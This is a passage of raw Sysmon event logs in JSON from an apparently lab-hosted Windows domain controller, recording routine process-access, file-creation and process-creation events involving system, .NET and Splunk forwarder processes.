C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010657C0F00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010657C0F00}","TargetProcessId":"3804","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:40.834\r\nProcessGuid: {41C8662E-2290-5F25-0000-001053790F00}\r\nProcessId: 1572\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\624-0\\System.Numerics.dll\r\nCreationUtcTime: 2020-08-01 08:06:40.834","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:40.834","ProcessGuid":"{41C8662E-2290-5F25-0000-001053790F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\624-0\\System.Numerics.dll","CreationUtcTime":"2020-08-01 08:06:40.834","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.865\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010947E0F00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.865","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010947E0F00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.865\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010947E0F00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.865","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010947E0F00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.865\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010947E0F00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.865","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010947E0F00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.928\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.928","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.413\r\nProcessGuid: {41C8662E-2291-5F25-0000-0010FF860F00}\r\nProcessId: 4116\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 